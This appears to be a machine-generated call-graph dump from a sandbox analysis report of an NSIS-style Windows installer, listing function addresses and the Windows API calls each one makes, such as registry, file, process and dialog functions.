4030->4027 4031 4028d5 4032 4028dd 4031->4032 4033 4028e1 FindNextFileW 4032->4033 4036 4028f3 4032->4036 4034 40293a 4033->4034 4033->4036 4037 406411 lstrcpynW 4034->4037 4037->4036 4038 401956 4039 402d3e 17 API calls 4038->4039 4040 40195d lstrlenW 4039->4040 4041 402630 4040->4041 4042 4044d7 lstrlenW 4043 4044f6 4042->4043 4044 4044f8 WideCharToMultiByte 4042->4044 4043->4044 4045 4014d7 4046 402d1c 17 API calls 4045->4046 4047 4014dd Sleep 4046->4047 4049 402bc2 4047->4049 3745 404858 3746 404884 3745->3746 3747 404895 3745->3747 3825 405a5b GetDlgItemTextW 3746->3825 3749 4048a1 GetDlgItem 3747->3749 3755 40490d 3747->3755 3751 4048b5 3749->3751 3750 40488f 3753 4066c0 5 API calls 3750->3753 3754 4048c9 SetWindowTextW 3751->3754 3758 405d91 4 API calls 3751->3758 3752 4049e4 3808 404b93 3752->3808 3812 405a5b GetDlgItemTextW 3752->3812 3753->3747 3761 404367 18 API calls 3754->3761 3755->3752 3759 40644e 17 API calls 3755->3759 3755->3808 3757 4043ce 8 API calls 3762 404ba7 3757->3762 3763 4048bf 3758->3763 3764 404974 SHBrowseForFolderW 3759->3764 3760 404a14 3765 405dee 18 API calls 3760->3765 3766 4048e5 3761->3766 3763->3754 3771 405ce6 3 API calls 3763->3771 3764->3752 3767 40498c CoTaskMemFree 3764->3767 3768 404a1a 3765->3768 3769 404367 18 API calls 3766->3769 3772 405ce6 3 API calls 3767->3772 3813 406411 lstrcpynW 3768->3813 3770 4048f3 3769->3770 3811 40439c SendMessageW 3770->3811 3771->3754 3773 404999 3772->3773 3776 4049d0 SetDlgItemTextW 3773->3776 3781 40644e 17 API calls 3773->3781 3776->3752 3777 4048f9 3779 406806 5 API calls 3777->3779 3778 404a31 3780 406806 5 API calls 3778->3780 3782 404900 3779->3782 3789 404a38 3780->3789 3783 4049b8 lstrcmpiW 3781->3783 3784 404908 SHAutoComplete 3782->3784 3782->3808 3783->3776 3786 4049c9 lstrcatW 3783->3786 3784->3755 3785 404a79 3826 406411 lstrcpynW 3785->3826 3786->3776 3787 404a47 GetDiskFreeSpaceExW 3787->3789 3798 404ad1 3787->3798 3789->3785 3789->3787 3793 405d32 2 API calls 3789->3793 3790 404a80 3791 405d91 4 API calls 3790->3791 3792 404a86 3791->3792 3794 404a8c 3792->3794 3795 404a8f GetDiskFreeSpaceW 3792->3795 3793->3789 3794->3795 3796 404aaa MulDiv 3795->3796 3795->3798 3796->3798 3797 404b42 3799 404b65 3797->3799 3802 40140b 2 API calls 3797->3802 3798->3797 3814 404cdd 3798->3814 3827 404389 KiUserCallbackDispatcher 3799->3827 3802->3799 3803 404b44 SetDlgItemTextW 3803->3797 3804 404b34 3817 404c14 3804->3817 3807 404b81 3807->3808 3809 404b8e 3807->3809 3808->3757 3828 4047b1 3809->3828 3811->3777 3812->3760 3813->3778 3815 404c14 20 API calls 3814->3815 3816 404b2f 3815->3816 3816->3803 3816->3804 3818 404c2d 3817->3818 3819 40644e 17 API calls 3818->3819 3820 404c91 3819->3820 3821 40644e 17 API calls 3820->3821 3822 404c9c 3821->3822 3823 40644e 17 API calls 3822->3823 3824 404cb2 lstrlenW wsprintfW SetDlgItemTextW 3823->3824 3824->3797 3825->3750 3826->3790 3827->3807 3829 4047c4 SendMessageW 3828->3829 3830 4047bf 3828->3830 3829->3808 3830->3829 3903 40175c 3904 402d3e 17 API calls 3903->3904 3905 401763 3904->3905 3906 405f36 2 API calls 3905->3906 3907 40176a 3906->3907 3908 405f36 2 API calls 3907->3908 3908->3907 4050 401d5d 4051 402d1c 17 API calls 4050->4051 4052 401d6e SetWindowLongW 4051->4052 4053 402bc2 4052->4053 3913 401ede 3914 402d1c 17 API calls 3913->3914 3915 401ee4 3914->3915 3916 402d1c 17 API calls 3915->3916 3917 401ef0 3916->3917 3918 401f07 EnableWindow 3917->3918 3919 401efc ShowWindow 3917->3919 3920 402bc2 3918->3920 3919->3920 4054 401563 4055 402b08 4054->4055 4058 406358 wsprintfW 4055->4058 4057 402b0d 4058->4057 4059 4026e4 4060 402d1c 17 API calls 4059->4060 4063 4026f3 4060->4063 4061 40273d ReadFile 4061->4063 4071 402830 4061->4071 4062 405f8a ReadFile 4062->4063 4063->4061 4063->4062 4064 402832 4063->4064 4065 40277d MultiByteToWideChar 4063->4065 4068 4027a3 SetFilePointer MultiByteToWideChar 4063->4068 4069 402843 4063->4069 4063->4071 4072 405fe8 SetFilePointer 4063->4072 4081 406358 wsprintfW 4064->4081 4065->4063 4068->4063 4070 402864 SetFilePointer 4069->4070 4069->4071 4070->4071 4073 406004 4072->4073 4076 40601c 4072->4076 4074 405f8a ReadFile 4073->4074 4075 406010 4074->4075 4075->4076 4077 406025 SetFilePointer 4075->4077 4078 40604d SetFilePointer 4075->4078 4076->4063 4077->4078 4079 406030 4077->4079 4078->4076 4080 405fb9 WriteFile 4079->4080 4080->4076 4081->4071 4082 401968 4083 402d1c 17 API calls 4082->4083 4084 40196f 4083->4084 4085 402d1c 17 API calls 4084->4085 4086 40197c 4085->4086 4087 402d3e 17 API calls 4086->4087 4088 401993 lstrlenW 4087->4088 4090 4019a4 4088->4090 4089 4019e5 4090->4089 4094 406411 lstrcpynW 4090->4094 4092 4019d5 4092->4089 4093 4019da lstrlenW 4092->4093 4093->4089 4094->4092 4095 40166a 4096 402d3e 17 API calls 4095->4096 4097 401670 4096->4097 4098 40676f 2 API calls 4097->4098 4099 401676 4098->4099 3579 4023ec 3580 402d3e 17 API calls 3579->3580 3581 4023fb 3580->3581 3582 402d3e 17 API calls 3581->3582 3583 402404 3582->3583 3584 402d3e 17 API calls 3583->3584 3585 40240e GetPrivateProfileStringW 3584->3585 4100 4053ed 4101 405411 4100->4101 4102 4053fd 4100->4102 4103 405419 IsWindowVisible 4101->4103 4111 405430 4101->4111 4104 405403 4102->4104 4105 40545a 4102->4105 4103->4105 4106 405426 4103->4106 4108 4043b3 SendMessageW 4104->4108 4107 40545f CallWindowProcW 4105->4107 4110 404d22 5 API calls 4106->4110 4109 40540d 4107->4109 4108->4109 4110->4111 4111->4107 4112 404da2 4 API calls 4111->4112 4112->4105 3678 40176f 3679 402d3e 17 API calls 3678->3679 3680 401776 3679->3680 3681 401796 3680->3681 3682 40179e 3680->3682 3717 406411 lstrcpynW 3681->3717 3718 406411 lstrcpynW 3682->3718 3685 40179c 3689 4066c0 5 API calls 3685->3689 3686 4017a9 3687 405ce6 3 API calls 3686->3687 3688 4017af lstrcatW 3687->3688 3688->3685 3699 4017bb 3689->3699 3690 40676f 2 API calls 3690->3699 3691 405ee2 2 API calls 3691->3699 3693 4017cd CompareFileTime 3693->3699 3694 40188d 3695 405479 24 API calls 3694->3695 3698 401897 3695->3698 3696 405479 24 API calls 3704 401879 3696->3704 3697 406411 lstrcpynW 3697->3699 3700 40324c 31 API calls 3698->3700 3699->3690 3699->3691 3699->3693 3699->3694 3699->3697 3705 40644e 17 API calls 3699->3705 3713 405a77 MessageBoxIndirectW 3699->3713 3714 401864 3699->3714 3716 405f07 GetFileAttributesW CreateFileW 3699->3716 3701 4018aa 3700->3701 3702 4018be SetFileTime 3701->3702 3703 4018d0 FindCloseChangeNotification 3701->3703 3702->3703 3703->3704 3706 4018e1 3703->3706 3705->3699 3707 4018e6 3706->3707 3708 4018f9 3706->3708 3709 40644e 17 API calls 3707->3709 3710 40644e 17 API calls 3708->3710 3711 4018ee lstrcatW 3709->3711 3712 401901 3710->3712 3711->3712 3715 405a77 MessageBoxIndirectW 3712->3715 3713->3699 3714->3696 3714->3704 3715->3704 3716->3699 3717->3685 3718->3686 4113 401a72 4114 402d1c 17 API calls 4113->4114 4115 401a7b 4114->4115 4116 402d1c 17 API calls 4115->4116 4117 401a20 4116->4117 4118 401573 4119 401583 ShowWindow 4118->4119 4120 40158c 4118->4120 4119->4120 4121 402bc2 4120->4121 4122 40159a ShowWindow 4120->4122 4122->4121 4123 4014f5 SetForegroundWindow 4124 402bc2 4123->4124 4125 401ff6 4126 402d3e 17 API calls 4125->4126 4127 401ffd 4126->4127 4128 40676f 2 API calls 4127->4128 4129 402003 4128->4129 4131 402014 4129->4131 4132 406358 wsprintfW 4129->4132 4132->4131 4133 401b77 4134 402d3e 17 API calls 4133->4134 4135 401b7e 4134->4135 4136 402d1c 17 API calls 4135->4136 4137 401b87 wsprintfW 4136->4137 4138 402bc2 4137->4138 4139 4022f7 4140 402d3e 17 API calls 4139->4140 4141 4022fd 4140->4141 4142 402d3e 17 API calls 4141->4142 4143 402306 4142->4143 4144 402d3e 17 API calls 4143->4144 4145 40230f 4144->4145 4146 40676f 2 API calls 4145->4146 4147 402318 4146->4147 4148 402329 lstrlenW lstrlenW 4147->4148 4149 40231c 4147->4149 4151 405479 24 API calls 4148->4151 4150 405479 24 API calls 4149->4150 4153 402324 4149->4153 4150->4153 4152 402367 SHFileOperationW 4151->4152 4152->4149 4152->4153 4154 40167b 4155 402d3e 17 API calls 4154->4155 4156 401682 4155->4156 4157 402d3e 17 API calls 4156->4157 4158 40168b 4157->4158 4159 402d3e 17 API calls 4158->4159 4160 401694 MoveFileW 4159->4160 4161 4016a0 4160->4161 4162 4016a7 4160->4162 4163 401423 24 API calls 4161->4163 4164 40676f 2 API calls 4162->4164 4166 4022ee 4162->4166 4163->4166 4165 4016b6 4164->4165 4165->4166 4167 4061d7 36 API calls 4165->4167 4167->4161 4168 40237b 4169 402382 4168->4169 4172 402395 4168->4172 4170 40644e 17 API calls 4169->4170 4171 40238f 4170->4171 4173 405a77 MessageBoxIndirectW 4171->4173 4173->4172 4174 4019ff 4175 402d3e 17 API calls 4174->4175 4176 401a06 4175->4176 4177 402d3e 17 API calls 4176->4177 4178 401a0f 4177->4178 4179 401a16 lstrcmpiW 4178->4179 4180 401a28 lstrcmpW 4178->4180 4181 401a1c 4179->4181 4180->4181 4182 401000 4183 401037 BeginPaint GetClientRect 4182->4183 4184 40100c DefWindowProcW 4182->4184 4185 4010f3 4183->4185 4189 401179 4184->4189 4187 401073 CreateBrushIndirect FillRect DeleteObject 4185->4187 4188 4010fc 4185->4188 4187->4185 4190 401102 CreateFontIndirectW 4188->4190 4191 401167 EndPaint 4188->4191 4190->4191 4192 401112 6 API calls 4190->4192 4191->4189 4192->4191 4193 401d81 4194 401d94 GetDlgItem 4193->4194 4195 401d87 4193->4195 4197 401d8e 4194->4197 4196 402d1c 17 API calls 4195->4196 4196->4197 4198 401dd5 GetClientRect LoadImageW SendMessageW 4197->4198 4199 402d3e 17 API calls 4197->4199 4201 401e33 4198->4201 4203 401e3f 4198->4203 4199->4198 4202 401e38 DeleteObject 4201->4202 4201->4203 4202->4203 3144 402482 3145 402d3e 17 API calls 3144->3145 3146 402494 3145->3146 3147 402d3e 17 API calls 3146->3147 3148 40249e 3147->3148 3161 402dce 3148->3161 3150 402925 3152 4024d6 3154 4024e2 3152->3154 3165 402d1c 3152->3165 3153 402d3e 17 API calls 3156 4024cc lstrlenW 3153->3156 3155 402501 RegSetValueExW 3154->3155 3168 40324c 3154->3168 3159 402517 RegCloseKey 3155->3159 3156->3152 3159->3150 3162 402de9 3161->3162 3188 4062ac 3162->3188 3166 40644e 17 API calls 3165->3166 3167 402d31 3166->3167 3167->3154 3170 403265 3168->3170 3169 403293 3192 403467 3169->3192 3170->3169 3195 40347d SetFilePointer 3170->3195 3174 403400 3176 403442 3174->3176 3181 403404 3174->3181 3175 4032b0 GetTickCount 3177 4033ea 3175->3177 3184 4032ff 3175->3184 3179 403467 ReadFile 3176->3179 3177->3155 3178 403467 ReadFile 3178->3184 3179->3177 3180 403467 ReadFile 3180->3181 3181->3177 3181->3180 3182 405fb9 WriteFile 3181->3182 3182->3181 3183 403355 GetTickCount 3183->3184 3184->3177 3184->3178 3184->3183 3185 40337a MulDiv wsprintfW 3184->3185 3187 405fb9 WriteFile 3184->3187 3186 405479 24 API calls 3185->3186 3186->3184 3187->3184 3189 4062bb 3188->3189 3190 4024ae 3189->3190 3191 4062c6 RegCreateKeyExW 3189->3191 3190->3150 3190->3152 3190->3153 3191->3190 3193 405f8a ReadFile 3192->3193 3194 40329e 3193->3194 3194->3174 3194->3175 3194->3177 3195->3169 4204 402902 4205 402d3e 17 API calls 4204->4205 4206 402909 FindFirstFileW 4205->4206 4207 402931 4206->4207 4211 40291c 4206->4211 4212 406358 wsprintfW 4207->4212 4209 40293a 4213 406411 lstrcpynW 4209->4213 4212->4209 4213->4211 4214 401503 4215 40150b 4214->4215 4217 40151e 4214->4217 4216 402d1c 17 API calls 4215->4216 4216->4217 3525 403a06 3526 403a10 CloseHandle 3525->3526 3527 403a1e 3525->3527 3526->3527 3532 403a4b 3527->3532 3530 405b23 67 API calls 3531 403a2f 3530->3531 3533 403a59 3532->3533 3534 403a5e FreeLibrary GlobalFree 3533->3534 3535 403a23 3533->3535 3534->3534 3534->3535 3535->3530 4218 402889 4219 402890 4218->4219 4222 402b0d 4218->4222 4220 402d1c 17 API calls 4219->4220 4221 402897 4220->4221 4223 4028a6 SetFilePointer 4221->4223 4223->4222 4224 4028b6 4223->4224 4226 406358 wsprintfW 4224->4226 4226->4222 4227 40190c 4228 401943 4227->4228 4229 402d3e 17 API calls 4228->4229 4230 401948 4229->4230 4231 405b23 67 API calls 4230->4231 4232 401951 4231->4232 3586 403e8e 3587 403fe1 3586->3587 3588 403ea6 3586->3588 3590 403ff2 GetDlgItem GetDlgItem 3587->3590 3591 404032 3587->3591 3588->3587 3589 403eb2 3588->3589 3592 403ed0 3589->3592 3593 403ebd SetWindowPos 3589->3593 3594 404367 18 API calls 3590->3594 3595 40408c 3591->3595 3600 401389 2 API calls 3591->3600 3597 403ed5 ShowWindow 3592->3597 3598 403eed 3592->3598 3593->3592 3599 40401c SetClassLongW 3594->3599 3596 4043b3 SendMessageW 3595->3596 3616 403fdc 3595->3616 3622 40409e 3596->3622 3597->3598 3601 403ef5 DestroyWindow 3598->3601 3602 403f0f 3598->3602 3603 40140b 2 API calls 3599->3603 3604 404064 3600->3604 3654 4042f0 3601->3654 3605 403f14 SetWindowLongW 3602->3605 3606 403f25 3602->3606 3603->3591 3604->3595 3609 404068 SendMessageW 3604->3609 3605->3616 3607 403f31 GetDlgItem 3606->3607 3608 403f9c 3606->3608 3612 403f61 3607->3612 3613 403f44 SendMessageW IsWindowEnabled 3607->3613 3664 4043ce 3608->3664 3609->3616 3610 40140b 2 API calls 3610->3622 3611 4042f2 DestroyWindow KiUserCallbackDispatcher 3611->3654 3618 403f6e 3612->3618 3619 403fb5 SendMessageW 3612->3619 3620 403f81 3612->3620 3628 403f66 3612->3628 3613->3612 3613->3616 3615 404321 ShowWindow 3615->3616 3617 40644e 17 API calls 3617->3622 3618->3619 3618->3628 3619->3608 3623 403f89 3620->3623 3624 403f9e 3620->3624 3622->3610 3622->3611 3622->3616 3622->3617 3625 404367 18 API calls 3622->3625 3645 404232 DestroyWindow 3622->3645 3655 404367 3622->3655 3627 40140b 2 API calls 3623->3627 3626 40140b 2 API calls 3624->3626 3625->3622 3626->3628 3627->3628 3628->3608 3661 404340 3628->3661 3630 404119 GetDlgItem 3631 404136 ShowWindow KiUserCallbackDispatcher 3630->3631 3632 40412e 3630->3632 3658 404389 KiUserCallbackDispatcher 3631->3658 3632->3631 3634 404160 KiUserCallbackDispatcher 3639 404174 3634->3639 3635 404179 GetSystemMenu EnableMenuItem SendMessageW 3636 4041a9 SendMessageW 3635->3636 3635->3639 3636->3639 3638 403e6f 18 API calls 3638->3639 3639->3635 3639->3638 3659 40439c SendMessageW 3639->3659 3660 406411 lstrcpynW 3639->3660 3641 4041d8 lstrlenW 3642 40644e 17 API calls 3641->3642 3643 4041ee SetWindowTextW 3642->3643 3644 401389 2 API calls 3643->3644 3644->3622 3646 40424c CreateDialogParamW 3645->3646 3645->3654 3647 40427f 3646->3647 3646->3654 3648 404367 18 API calls 3647->3648 3649 40428a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3648->3649 3650 401389 2 API calls 3649->3650 3651 4042d0 3650->3651 3651->3616 3652 4042d8 ShowWindow 3651->3652 3653 4043b3 SendMessageW 3652->3653 3653->3654 3654->3615 3654->3616 3656 40644e 17 API calls 3655->3656 3657 404372 SetDlgItemTextW 3656->3657 3657->3630 3658->3634 3659->3639 3660->3641 3662 404347 3661->3662 3663 40434d SendMessageW 3661->3663 3662->3663 3663->3608 3665 4043e6 GetWindowLongW 3664->3665 3666 404491 3664->3666 3665->3666 3667 4043fb 3665->3667 3666->3616 3667->3666 3668 404428 GetSysColor 3667->3668 3669 40442b 3667->3669 3668->3669 3670 404431 SetTextColor 3669->3670 3671 40443b SetBkMode 3669->3671 3670->3671 3672 404453 GetSysColor 3671->3672 3673 404459 3671->3673 3672->3673 3674 404460 SetBkColor 3673->3674 3675 40446a 3673->3675 3674->3675 3675->3666 3676 404484 CreateBrushIndirect 3675->3676 3677 40447d DeleteObject 3675->3677 3676->3666 3677->3676 4233 40190f 4234 402d3e 17 API calls 4233->4234 4235 401916 4234->4235 4236 405a77 MessageBoxIndirectW 4235->4236 4237 40191f 4236->4237 4238 404811 4239 404821 4238->4239 4240 404847 4238->4240 4241 404367 18 API calls 4239->4241 4242 4043ce 8 API calls 4240->4242 4243 40482e SetDlgItemTextW 4241->4243 4244 404853 4242->4244 4243->4240 4245 401491 4246 405479 24 API calls 4245->4246 4247 401498 4246->4247 4248 401f12 4249 402d3e 17 API calls 4248->4249 4250 401f18 4249->4250 4251 402d3e 17 API calls 4250->4251 4252 401f21 4251->4252 4253 402d3e 17 API calls 4252->4253 4254 401f2a 4253->4254 4255 402d3e 17 API calls 4254->4255 4256 401f33 4255->4256 4257 401423 24 API calls 4256->4257 4258 401f3a 4257->4258 4265 405a3d ShellExecuteExW 4258->4265 4260 401f82 4261 4068b1 5 API calls 4260->4261 4263 402925 4260->4263 4262 401f9f CloseHandle 4261->4262 4262->4263 4265->4260 4266 402614 4267 402d3e 17 API calls 4266->4267 4268 40261b 4267->4268 4271 405f07 GetFileAttributesW CreateFileW 4268->4271 4270 402627 4271->4270 4272 402596 4273 402d7e 17 API calls 4272->4273 4274 4025a0 4273->4274 4275 402d1c 17 API calls 4274->4275 4276 4025a9 4275->4276 4277 4025d1 RegEnumValueW 4276->4277 4278 4025c5 RegEnumKeyW 4276->4278 4280 402925 4276->4280 4279 4025e6 RegCloseKey 4277->4279 4278->4279 4279->4280 4282 401d17 4283 402d1c 17 API calls 4282->4283 4284 401d1d IsWindow 4283->4284 4285 401a20 4284->4285 3880 401b9b 3881 401ba8 3880->3881 3882 401bec 3880->3882 3883 401c31 3881->3883 3888 401bbf 3881->3888 3884 401bf1 3882->3884 3885 401c16 GlobalAlloc 3882->3885 3887 40644e 17 API calls 3883->3887 3896 402395 3883->3896 3884->3896 3901 406411 lstrcpynW 3884->3901 3886 40644e 17 API calls 3885->3886 3886->3883 3889 40238f 3887->3889 3899 406411 lstrcpynW 3888->3899 3894 405a77 MessageBoxIndirectW 3889->3894 3891 401c03 GlobalFree 3891->3896 3893 401bce 3900 406411 lstrcpynW 3893->3900 3894->3896 3897 401bdd 3902 406411 lstrcpynW 3897->3902 3899->3893 3900->3897 3901->3891 3902->3896 3909 402b9d SendMessageW 3910 402bc2 3909->3910 3911 402bb7 InvalidateRect 3909->3911 3911->3910 4286 40449d lstrcpynW lstrlenW 4287 40149e 4288 4014ac PostQuitMessage 4287->4288 4289 402395 4287->4289 4288->4289 4290 403a9e 4291 403aa9 4290->4291 4292 403ab0 GlobalAlloc 4291->4292 4293 403aad 4291->4293 4292->4293 3196 4021a2 3197 402d3e 17 API calls 3196->3197 3198 4021a9 3197->3198 3199 402d3e 17 API calls 3198->3199 3200 4021b3 3199->3200 3201 402d3e 17 API calls 3200->3201 3202 4021bd 3201->3202 3203 402d3e 17 API calls 3202->3203 3204 4021c7 3203->3204 3205 402d3e 17 API calls 3204->3205 3207 4021d1 3205->3207 3206 402210 CoCreateInstance 3211 40222f 3206->3211 3207->3206 3208 402d3e 17 API calls 3207->3208 3208->3206 3209 401423 24 API calls 3210 4022ee 3209->3210 3211->3209 3211->3210 3212 402522 3223 402d7e 3212->3223 3215 402d3e 17 API calls 3216 402535 3215->3216 3217 402540 RegQueryValueExW 3216->3217 3218 402925 3216->3218 3219 402560 3217->3219 3222 402566 RegCloseKey 3217->3222 3219->3222 3228 406358 wsprintfW 3219->3228 3222->3218 3224 402d3e 17 API calls 3223->3224 3225 402d95 3224->3225 3226 40627e RegOpenKeyExW 3225->3226 3227 40252c 3226->3227 3227->3215 3228->3222 4294 4015a3 4295 402d3e 17 API calls 4294->4295 4296 4015aa SetFileAttributesW 4295->4296 4297 4015bc 4296->4297 3251 401fa4 3252 402d3e 17 API calls 3251->3252 3253 401faa 3252->3253 3254 405479 24 API calls 3253->3254 3255 401fb4 3254->3255 3266 4059fa CreateProcessW 3255->3266 3258 402925 3261 401fcf 3262 401fd4 3261->3262 3263 401fdf 3261->3263 3274 406358 wsprintfW 3262->3274 3265 401fdd CloseHandle 3263->3265 3265->3258 3267 401fba 3266->3267 3268 405a2d CloseHandle 3266->3268 3267->3258 3267->3265 3269 4068b1 WaitForSingleObject 3267->3269 3268->3267 3270 4068cb 3269->3270 3271 4068dd GetExitCodeProcess 3270->3271 3275 406842 3270->3275 3271->3261 3274->3265 3276 40685f PeekMessageW 3275->3276 3277 406855 DispatchMessageW 3276->3277 3278 40686f WaitForSingleObject 3276->3278 3277->3276 3278->3270 4298 404526 4299 404658 4298->4299 4300 40453e 4298->4300 4301 4046c2 4299->4301 4304 40478c 4299->4304 4307 404693 GetDlgItem SendMessageW 4299->4307 4303 404367 18 API calls 4300->4303 4302 4046cc GetDlgItem 4301->4302 4301->4304 4305 4046e6 4302->4305 4306 40474d 4302->4306 4308 4045a5 4303->4308 4309 4043ce 8 API calls 4304->4309 4305->4306 4313 40470c SendMessageW LoadCursorW SetCursor 4305->4313 4306->4304 4314 40475f 4306->4314 4331 404389 KiUserCallbackDispatcher 4307->4331 4311 404367 18 API calls 4308->4311 4312 404787 4309->4312 4316 4045b2 CheckDlgButton 4311->4316 4332 4047d5 4313->4332 4318 404775 4314->4318 4319 404765 SendMessageW 4314->4319 4315 4046bd 4321 4047b1 SendMessageW 4315->4321 4329 404389 KiUserCallbackDispatcher 4316->4329 4318->4312 4320 40477b SendMessageW 4318->4320 4319->4318 4320->4312 4321->4301 4324 4045d0 GetDlgItem 4330 40439c SendMessageW 4324->4330 4326 4045e6 SendMessageW 4327 404603 GetSysColor 4326->4327 4328 40460c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4326->4328 4327->4328 4328->4312 4329->4324 4330->4326 4331->4315 4335 405a3d ShellExecuteExW 4332->4335 4334 40473b LoadCursorW SetCursor 4334->4306 4335->4334 3566 4023aa 3567 4023b2 3566->3567 3569 4023b8 3566->3569 3568 402d3e 17 API calls 3567->3568 3568->3569 3570 402d3e 17 API calls 3569->3570 3572 4023c6 3569->3572 3570->3572 3571 4023d4 3574 402d3e 17 API calls 3571->3574 3572->3571 3573 402d3e 17 API calls 3572->3573 3573->3571 3575 4023dd WritePrivateProfileStringW 3574->3575 4336 40202a 4337 402d3e 17 API calls 4336->4337 4338 402031 4337->4338 4339 406806 5 API calls 4338->4339 4340 402040 4339->4340 4341 4020c4 4340->4341 4342 40205c GlobalAlloc 4340->4342 4342->4341 4343 402070 4342->4343 4344 406806 5 API calls 4343->4344 4345 402077 4344->4345 4346 406806 5 API calls 4345->4346 4347 402081 4346->4347 4347->4341 4351 406358 wsprintfW 4347->4351 4349 4020b6 4352 406358 wsprintfW 4349->4352 4351->4349 4352->4341 4353 402f2b 4354 402f56 4353->4354 4355 402f3d SetTimer 4353->4355 4356 402fab 4354->4356 4357 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4354->4357 4355->4354 4357->4356 4358 40242c 4359 402434 4358->4359 4360 40245f 4358->4360 4362 402d7e 17 API calls 4359->4362 4361 402d3e 17 API calls 4360->4361 4363 402466 4361->4363 4364 40243b 4362->4364 4369 402dfc 4363->4369 4366 402473 4364->4366 4367 402d3e 17 API calls 4364->4367 4368 40244c RegDeleteValueW RegCloseKey 4367->4368 4368->4366 4370 402e09 4369->4370 4371 402e10 4369->4371 4370->4366 4371->4370 4373 402e41 4371->4373 4374 40627e RegOpenKeyExW 4373->4374 4375 402e6f 4374->4375 4376 402ea2 4375->4376 4377 402e7f RegEnumValueW 4375->4377 4384 402f19 4375->4384 4378 402f09 RegCloseKey 4376->4378 4379 402ede RegEnumKeyW 4376->4379 4380 402ee7 RegCloseKey 4376->4380 4383 402e41 6 API calls 4376->4383 4377->4376 4377->4378 4378->4384 4379->4376 4379->4380 4381 406806 5 API calls 4380->4381 4382 402ef7 4381->4382 4382->4384 4385 402efb RegDeleteKeyW 4382->4385 4383->4376 4384->4370 4385->4384 4386 404bae 4387 404bda 4386->4387 4388 404bbe 4386->4388 4390 404be0 SHGetPathFromIDListW 4387->4390 4391 404c0d 4387->4391 4397 405a5b GetDlgItemTextW 4388->4397 4393 404bf0 4390->4393 4394 404bf7 SendMessageW 4390->4394 4392 404bcb SendMessageW 4392->4387 4396 40140b 2 API calls 4393->4396 4394->4391 4396->4394 4397->4392 4398 401a30 4399 402d3e 17 API calls 4398->4399 4400 401a39 ExpandEnvironmentStringsW 4399->4400 4401 401a4d 4400->4401 4403 401a60 4400->4403 4402 401a52 lstrcmpW 4401->4402 4401->4403 4402->4403 4409 401735 4410 402d3e 17 API calls 4409->4410 4411 40173c SearchPathW 4410->4411 4412 401757 4411->4412 4413 402636 4414 402665 4413->4414 4415 40264a 4413->4415 4417 402695 4414->4417 4418 40266a 4414->4418 4416 402d1c 17 API calls 4415->4416 4425 402651 4416->4425 4419 402d3e 17 API calls 4417->4419 4420 402d3e 17 API calls 4418->4420 4421 40269c lstrlenW 4419->4421 4422 402671 4420->4422 4421->4425 4430 406433 WideCharToMultiByte 4422->4430 4424 402685 lstrlenA 4424->4425 4426 4026c9 4425->4426 4427 4026df 4425->4427 4429 405fe8 5 API calls 4425->4429 4426->4427 4428 405fb9 WriteFile 4426->4428 4428->4427 4429->4426 4430->4424 3831 4055b8 3832 405762 3831->3832 3833 4055d9 GetDlgItem GetDlgItem GetDlgItem 3831->3833 3835 405793 3832->3835 3836 40576b GetDlgItem CreateThread FindCloseChangeNotification 3832->3836 3876 40439c SendMessageW 3833->3876 3838 4057be 3835->3838 3839 4057e3 3835->3839 3840 4057aa ShowWindow ShowWindow 3835->3840 3836->3835 3879 40554c 5 API calls 3836->3879 3837 405649 3845 405650 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3837->3845 3841 40581e 3838->3841 3842 4057d2 3838->3842 3843 4057f8 ShowWindow 3838->3843 3844 4043ce 8 API calls 3839->3844 3878 40439c SendMessageW 3840->3878 3841->3839 3853 40582c SendMessageW 3841->3853 3847 404340 SendMessageW 3842->3847 3849 405818 3843->3849 3850 40580a 3843->3850 3848 4057f1 3844->3848 3851 4056a2 SendMessageW SendMessageW 3845->3851 3852 4056be 3845->3852 3847->3839 3855 404340 SendMessageW 3849->3855 3854 405479 24 API calls 3850->3854 3851->3852 3856 4056d1 3852->3856 3857 4056c3 SendMessageW 3852->3857 3853->3848 3858 405845 CreatePopupMenu 3853->3858 3854->3849 3855->3841 3860 404367 18 API calls 3856->3860 3857->3856 3859 40644e 17 API calls 3858->3859 3862 405855 AppendMenuW 3859->3862 3861 4056e1 3860->3861 3865 4056ea ShowWindow 3861->3865 3866 40571e GetDlgItem SendMessageW 3861->3866 3863 405872 GetWindowRect 3862->3863 3864 405885 TrackPopupMenu 3862->3864 3863->3864 3864->3848 3867 4058a0 3864->3867 3868 405700 ShowWindow 3865->3868 3869 40570d 3865->3869 3866->3848 3870 405745 SendMessageW SendMessageW 3866->3870 3871 4058bc SendMessageW 3867->3871 3868->3869 3877 40439c SendMessageW 3869->3877 3870->3848 3871->3871 3872 4058d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3871->3872 3874 4058fe SendMessageW 3872->3874 3874->3874 3875 405927 GlobalUnlock SetClipboardData CloseClipboard 3874->3875 3875->3848 3876->3837 3877->3866 3878->3838 4431 401d38 4432 402d1c 17 API calls 4431->4432 4433 401d3f 4432->4433 4434 402d1c 17 API calls 4433->4434 4435 401d4b GetDlgItem 4434->4435 4436 402630 4435->4436 4437 4014b8 4438 4014be 4437->4438 4439 401389 2 API calls 4438->4439 4440 4014c6 4439->4440 4441 4028bb 4442 4028c1 4441->4442 4443 4028c9 FindClose 4442->4443 4444 402bc2 4442->4444 4443->4444 3912 405a3d ShellExecuteExW

                                                                                                                              Executed Functions

                                                                                                                              Function 004034C5 Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 410stringfilecomCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
